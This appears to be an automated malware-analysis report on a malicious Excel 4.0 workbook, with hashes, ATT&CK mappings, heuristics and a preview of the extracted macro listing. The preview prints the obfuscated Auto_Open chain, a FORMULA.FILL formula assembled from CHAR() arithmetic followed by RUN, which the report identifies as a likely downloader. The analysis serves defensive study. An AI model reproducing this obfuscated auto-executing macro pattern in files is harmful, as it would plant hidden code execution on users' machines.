Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6372036534f05e7…

MALICIOUS

Office (OLE)

Size: 174.0 KB | Created: 2020-05-12 12:47:52 | Authoring application: Microsoft Excel | First seen: 2020-08-10
MD5: 304ee78dcb8f3a4555d420eac718c2bd
SHA-1: cf4c718e65812bdcfcb3c1ba84311edc59d23253
SHA-256: f6372036534f05e79a1baa3a56d634e0c71e2f3a71f495225c43d8b137ea1016
Risk Score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution

The file contains Excel 4.0 (XLM) macros, specifically an Auto_Open macro that uses the dangerous functions FORMULA.FILL and RUN. In the recovered listing, FORMULA.FILL writes a formula string that is assembled at run time from CHAR() calls over arithmetic on other cells, and RUN then transfers control to it, so the real payload is never visible as plain text in the sheet. This indicates the macro is designed to execute arbitrary commands, most likely to download and execute a second-stage payload.

Heuristics (3)

  • OLE_XLM_AUTOOPEN_DEFINEDNAME (critical) - Excel 4.0 Auto_Open defined name
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • OLE_XLM_DANGEROUS_FN (critical) - XLM Auto_Open with dangerous formula APIs
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry together with dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • OLE_XLM_AUTOOPEN (medium) - Excel 4.0 (XLM) macro sheet present
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 126368 bytes
SHA-256: fec3e0cc333456308248b9bf839af4c265edb7689796b85747e375c5a9cd1457
Preview script
First 1,000 lines of the extracted script (BIFF record summary, Auto_Open defined name, and the macro-sheet cells that carry the FORMULA.FILL / RUN chain; the numeric filler cells and the remainder of the listing are omitted here):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JP56538 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,ET27,"",-387.00000000000000000000
'  Sheet,DI60,"",0.11489898989898990334
'  Sheet,DX80,"",-6.65853658536585335526
'  Sheet,HM89,"",-1233.00000000000000000000
'  Sheet,CM135,"",0.06691919191919191989
'  Sheet,HI136,"FORMULA.FILL(CHAR(IX23620+HJ21030)&CHAR(GW8191/EP31778)&CHAR(GW8191/Z15383)&CHAR(ES57153-F28575)&CHAR(FD23243*BA24624)&CHAR(FJ38391-HW40705)&CHAR(FJ38391/GH18825)&CHAR(FH56526*M21719)&CHAR(IX23620*EK45308)&CHAR(IQ8401-FO64536)&CHAR(FA19183*DQ5744)&CHAR(FD23243/GU65340)&CHAR(FJ38391+HE32401)&CHAR(GW8191-DH58173)&CHAR(HV50424-BC53248)&CHAR(FA19183/D6996)&CHAR(FJ38391*FQ12443)&CHAR(FA19183-E55930)&CHAR(FH56526/JS29981)&CHAR(HF61404/HU60974)&CHAR(IX23620/CL39643)&CHAR(FD23243/DK3762)&CHAR(FH56526*DS4617)&CHAR(HV50424-BG63175)&CHAR(IX23620/DX60757)&CHAR(IQ8401-FC12701)&CHAR(GW8191-FT56026)&CHAR(HV50424/HU29721)&CHAR(GW8191+CH3577)&CHAR(IQ8401*FH55986)&CHAR(HF61404-FN10223)&CHAR(GW8191/CU58195)&CHAR(IX23620*HK57622)&CHAR(HF61404-J33493)&CHAR(FH56526/CF31678)&CHAR(HV50424*JC2567)&CHAR(FH56526/CP23600)&CHAR(HV50424*T50483)&CHAR(ES57153+BM38241)&CHAR(HV50424*A35410)&CHAR(FA19183+CD19846)&CHAR(FJ38391*HY46334)&CHAR(FD23243+J8921)&CHAR(FA19183+DC14606)&CHAR(HF61404/DJ11039)&CHAR(FD23243*JN52331)&CHAR(FD23243+D35747)&CHAR(IQ8401+EW47866)&CHAR(ES57153*DU15292)&CHAR(HV50424/CZ47707)&CHAR(FA19183/DI41272)&CHAR(HF61404*CB42660)&CHAR(FJ38391+HP52268)&CHAR(HV50424+IW57930)&CHAR(FJ38391/BI32942)&CHAR(GW8191+FX46326)&CHAR(HF61404+HS43283)&CHAR(FA19183*JT58041)&CHAR(GW8191*FP52849)&CHAR(HF61404-EQ36902)&CHAR(HV50424+EA4870)&CHAR(HF61404+FV64571)&CHAR(GW8191*FB742)&CHAR(FA19183+A47713)&CHAR(FA19183/GM9925)&CHAR(FA19183*CG27558)&CHAR(IQ8401-FE21407)&CHAR(HF61404/R49595)&CHAR(FD23243*HH62258)&CHAR(IQ8401*IH50125)&CHAR(FH56526+CH6448)&CHAR(IQ8401+HY65217)&CHAR(HV50424+FB10005),IO51666)",""
'  Sheet,HI137,RUN(HY31532),""